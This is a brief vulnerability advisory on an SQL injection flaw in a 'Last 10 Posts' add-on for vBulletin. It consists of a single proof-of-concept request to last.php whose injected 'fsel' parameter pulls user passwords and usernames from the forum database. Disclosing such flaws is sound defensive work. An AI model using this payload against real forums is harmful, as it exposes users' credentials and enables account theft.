Last 10 Posts Add-On Script For VBulletin SQL Injection Vulnerability

Last 10 Posts Add-On Script For VBulletin SQL Injection Vulnerability

The following proof of concept is available:

#/last.php?fsel=,user.password%20as%20title,user.%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20WHERE%20usergroupid=1%20LIMIT%201/*